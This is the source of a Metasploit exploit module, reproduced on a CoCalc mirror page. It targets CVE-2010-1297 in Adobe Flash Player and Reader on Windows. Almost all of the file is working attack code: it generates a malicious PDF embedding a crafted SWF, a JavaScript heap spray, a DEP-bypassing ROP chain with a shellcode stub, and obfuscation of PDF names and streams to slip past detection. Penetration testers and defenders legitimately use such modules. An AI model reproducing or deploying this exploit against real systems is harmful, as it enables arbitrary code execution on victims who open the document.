CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'zlib'67class MetasploitModule < Msf::Exploit::Remote8Rank = NormalRanking910include Msf::Exploit::FILEFORMAT1112def initialize(info = {})13super(update_info(info,14'Name' => 'Adobe Flash Player "newfunction" Invalid Pointer Use',15'Description' => %q{16This module exploits a vulnerability in the DoABC tag handling within17versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also18vulnerable, as are any other applications that may embed Flash player.1920Arbitrary code execution is achieved by embedding a specially crafted Flash21movie into a PDF document. An AcroJS heap spray is used in order to ensure22that the memory used by the invalid pointer issue is controlled.2324NOTE: This module uses a similar DEP bypass method to that used within the25adobe_libtiff module. This method is unlikely to work across various26Windows versions due a the hardcoded syscall number.27},28'License' => MSF_LICENSE,29'Author' =>30[31'Unknown', # Found being openly exploited32'jduck' # Metasploit version33],34'References' =>35[36['CVE', '2010-1297'],37['OSVDB', '65141'],38['BID', '40586'],39['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],40# For SWF->PDF embedding41['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']42],43'DefaultOptions' =>44{45'EXITFUNC' => 'process',46'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',47'DisablePayloadHandler' => true48},49'Payload' =>50{51'Space' => 1000,52'BadChars' => "\x00",53'DisableNops' => true54},55'Platform' => 'win',56'Targets' =>57[58# Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd59# Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd60# Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd61[ 'Automatic', { }],62],63'DisclosureDate' => '2010-06-04',64'DefaultTarget' => 0))6566register_options(67[68OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),69])70end7172def exploit73swf_data = make_swf()74js_data = make_js(payload.encoded)7576# Create the pdf77pdf = make_pdf(swf_data, js_data)7879print_status("Creating '#{datastore['FILENAME']}' file...")8081file_create(pdf)82end8384def make_swf85# load the static swf file86path = File.join( Msf::Config.data_directory, "exploits", "CVE-2010-1297.swf" )87fd = File.open( path, "rb" )88swf_data = fd.read(fd.stat.size)89fd.close90swf_data91end9293def make_js(encoded_payload)9495# The following executes a ret2lib using BIB.dll96# The effect is to bypass DEP and execute the shellcode in an indirect way97stack_data = [980xc0c0c0c,990x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret1000xcccccccc,1010x70048ef, # xchg eax,esp / ret1020x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]1030xcccccccc,1040x7009084, # ret1050x7009084, # ret1060x7009084, # ret1070x7009084, # ret1080x7009084, # ret1090x7009084, # ret1100x7009033, # ret 0x181110x7009084, # ret1120xc0c0c0c,1130x7009084, # ret1140x7009084, # ret1150x7009084, # ret1160x7009084, # ret1170x7009084, # ret1180x7009084, # ret1190x7009084, # ret1200x7009084, # ret1210x7001599, # pop ebp / ret1220x10124,1230x70072f7, # pop eax / ret1240x10104,1250x70015bb, # pop ecx / ret1260x1000,1270x700154d, # mov [eax], ecx / ret1280x70015bb, # pop ecx / ret1290x7ffe0300, # -- location of KiFastSystemCall1300x7007fb2, # mov eax, [ecx] / ret1310x70015bb, # pop ecx / ret1320x10011,1330x700a8ac, # mov [ecx], eax / xor eax,eax / ret1340x70015bb, # pop ecx / ret1350x10100,1360x700a8ac, # mov [ecx], eax / xor eax,eax / ret1370x70072f7, # pop eax / ret1380x10011,1390x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)1400x7005c54, # pop esi / add esp,0x14 / ret1410xffffffff,1420x10100,1430x0,1440x10104,1450x1000,1460x40,147# The next bit effectively copies data from the interleaved stack to the memory148# pointed to by eax149# The data copied is:150# \x5a\x90\x54\x90\x5a\xeb\x15\x58\x8b\x1a\x89\x18\x83\xc0\x04\x83151# \xc2\x04\x81\xfb\x0c\x0c\x0c\x0c\x75\xee\xeb\x05\xe8\xe6\xff\xff152# \xff\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xff\xff\x901530x700d731, # mov eax, [ebp-0x24] / ret1540x70015bb, # pop ecx / ret1550x9054905a,1560x700154d, # mov [eax], ecx / ret1570x700a722, # add eax, 4 / ret1580x70015bb, # pop ecx / ret1590x5815eb5a,1600x700154d, # mov [eax], ecx / ret1610x700a722, # add eax, 4 / ret1620x70015bb, # pop ecx / ret1630x18891a8b,1640x700154d, # mov [eax], ecx / ret1650x700a722, # add eax, 4 / ret1660x70015bb, # pop ecx / ret1670x8304c083,1680x700154d, # mov [eax], ecx / ret1690x700a722, # add eax, 4 / ret1700x70015bb, # pop ecx / ret1710xfb8104c2,1720x700154d, # mov [eax], ecx / ret1730x700a722, # add eax, 4 / ret1740x70015bb, # pop ecx / ret1750xc0c0c0c,1760x700154d, # mov [eax], ecx / ret1770x700a722, # add eax, 4 / ret1780x70015bb, # pop ecx / ret1790x5ebee75,1800x700154d, # mov [eax], ecx / ret1810x700a722, # add eax, 4 / ret1820x70015bb, # pop ecx / ret1830xffffe6e8,1840x700154d, # mov [eax], ecx / ret1850x700a722, # add eax, 4 / ret1860x70015bb, # pop ecx / ret1870x909090ff,1880x700154d, # mov [eax], ecx / ret1890x700a722, # add eax, 4 / ret1900x70015bb, # pop ecx / ret1910x90909090,1920x700154d, # mov [eax], ecx / ret1930x700a722, # add eax, 4 / ret1940x70015bb, # pop ecx / ret1950x90909090,1960x700154d, # mov [eax], ecx / ret1970x700a722, # add eax, 4 / ret1980x70015bb, # pop ecx / ret1990x90ffffff,2000x700154d, # mov [eax], ecx / ret2010x700d731, # mov eax, [ebp-0x24] / ret2020x700112f # call eax -- (execute stub to transition to full shellcode)203].pack('V*')204205var_unescape = rand_text_alpha(rand(100) + 1)206var_shellcode = rand_text_alpha(rand(100) + 1)207208var_start = rand_text_alpha(rand(100) + 1)209210var_s = 0x10000211var_c = rand_text_alpha(rand(100) + 1)212var_b = rand_text_alpha(rand(100) + 1)213var_d = rand_text_alpha(rand(100) + 1)214var_3 = rand_text_alpha(rand(100) + 1)215var_i = rand_text_alpha(rand(100) + 1)216var_4 = rand_text_alpha(rand(100) + 1)217218payload_buf = ''219payload_buf << stack_data220payload_buf << encoded_payload221222escaped_payload = Rex::Text.to_unescape(payload_buf)223224js = %Q|225var #{var_unescape} = unescape;226var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );227var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );228while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};229#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);230#{var_b} += #{var_shellcode};231#{var_b} += #{var_c};232#{var_d} = #{var_b}.substring(0, #{var_s}/2);233while(#{var_d}.length < 0x80000) #{var_d} += #{var_d};234#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);235var #{var_4} = new Array();236for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s";237|238239js240end241242def random_non_ascii_string(count)243result = ""244count.times do245result << (rand(128) + 128).chr246end247result248end249250def io_def(id)251"%d 0 obj\n" % id252end253254def io_ref(id)255"%d 0 R" % id256end257258259#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/260def n_obfu(str)261result = ""262str.scan(/./u) do |c|263if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'264result << "#%x" % c.unpack("C*")[0]265else266result << c267end268end269result270end271272273def ascii_hex_whitespace_encode(str)274result = ""275whitespace = ""276str.each_byte do |b|277result << whitespace << "%02x" % b278whitespace = " " * (rand(3) + 1)279end280result << ">"281end282283284def make_pdf(swf, js)285286swf_name = rand_text_alpha(8 + rand(8)) + ".swf"287288xref = []289eol = "\n"290endobj = "endobj" << eol291292# Randomize PDF version?293pdf = "%PDF-1.5" << eol294#pdf << "%" << random_non_ascii_string(4) << eol295296# catalog297xref << pdf.length298pdf << io_def(1) << n_obfu("<</Type/Catalog")299pdf << n_obfu("/Pages ") << io_ref(3)300pdf << n_obfu("/OpenAction ") << io_ref(5)301pdf << n_obfu(">>")302pdf << eol << endobj303304# pages array305xref << pdf.length306pdf << io_def(3) << n_obfu("<</Type/Pages/Count 1/Kids [") << io_ref(4) << n_obfu("]>>") << eol << endobj307308# page 1309xref << pdf.length310pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3)311pdf << n_obfu("/Annots [") << io_ref(7) << n_obfu("] ")312pdf << n_obfu(">>")313pdf << eol << endobj314315# js action316xref << pdf.length317pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << eol << endobj318319# js stream320xref << pdf.length321compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))322pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol323pdf << "stream" << eol324pdf << compressed << eol325pdf << "endstream" << eol326pdf << endobj327328# swf annotation object329xref << pdf.length330pdf << io_def(7) << n_obfu("<</Type/Annot/Subtype/RichMedia")331pdf << n_obfu("/Rect [20 20 187 69] ")332pdf << n_obfu("/RichMediaSettings ") << io_ref(8)333pdf << n_obfu("/RichMediaContent ") << io_ref(9)334pdf << n_obfu("/NM (") << swf_name << n_obfu(")")335pdf << n_obfu(">>")336pdf << eol << endobj337338# rich media settings339xref << pdf.length340pdf << io_def(8)341pdf << n_obfu("<</Type/RichMediaSettings/Subtype/Flash")342pdf << n_obfu("/Activation ") << io_ref(10)343pdf << n_obfu("/Deactivation ") << io_ref(11)344pdf << n_obfu(">>")345pdf << eol << endobj346347# rich media content348xref << pdf.length349pdf << io_def(9)350pdf << n_obfu("<</Type/RichMediaContent")351pdf << n_obfu("/Assets ") << io_ref(12)352pdf << n_obfu("/Configurations [") << io_ref(14) << "]"353pdf << n_obfu(">>")354pdf << eol << endobj355356# rich media activation / deactivation357xref << pdf.length358pdf << io_def(10)359pdf << n_obfu("<</Type/RichMediaActivation/Condition/PO>>")360pdf << eol << endobj361362xref << pdf.length363pdf << io_def(11)364pdf << n_obfu("<</Type/RichMediaDeactivation/Condition/XD>>")365pdf << eol << endobj366367# rich media assets368xref << pdf.length369pdf << io_def(12)370pdf << n_obfu("<</Names [(#{swf_name}) ") << io_ref(13) << n_obfu("]>>")371pdf << eol << endobj372373# swf embeded file ref374xref << pdf.length375pdf << io_def(13)376pdf << n_obfu("<</Type/Filespec /EF <</F ") << io_ref(16) << n_obfu(">> /F(#{swf_name})>>")377pdf << eol << endobj378379# rich media configuration380xref << pdf.length381pdf << io_def(14)382pdf << n_obfu("<</Type/RichMediaConfiguration/Subtype/Flash")383pdf << n_obfu("/Instances [") << io_ref(15) << n_obfu("]>>")384pdf << eol << endobj385386# rich media isntance387xref << pdf.length388pdf << io_def(15)389pdf << n_obfu("<</Type/RichMediaInstance/Subtype/Flash")390pdf << n_obfu("/Asset ") << io_ref(13)391pdf << n_obfu(">>")392pdf << eol << endobj393394# swf stream395# NOTE: This data is already compressed, no need to compress it again...396xref << pdf.length397pdf << io_def(16) << n_obfu("<</Type/EmbeddedFile/Length %s>>" % swf.length) << eol398pdf << "stream" << eol399pdf << swf << eol400pdf << "endstream" << eol401pdf << endobj402403# trailing stuff404xrefPosition = pdf.length405pdf << "xref" << eol406pdf << "0 %d" % (xref.length + 1) << eol407pdf << "0000000000 65535 f" << eol408xref.each do |index|409pdf << "%010d 00000 n" % index << eol410end411412pdf << "trailer" << eol413pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol414415pdf << "startxref" << eol416pdf << xrefPosition.to_s() << eol417418pdf << "%%EOF" << eol419420end421end422423424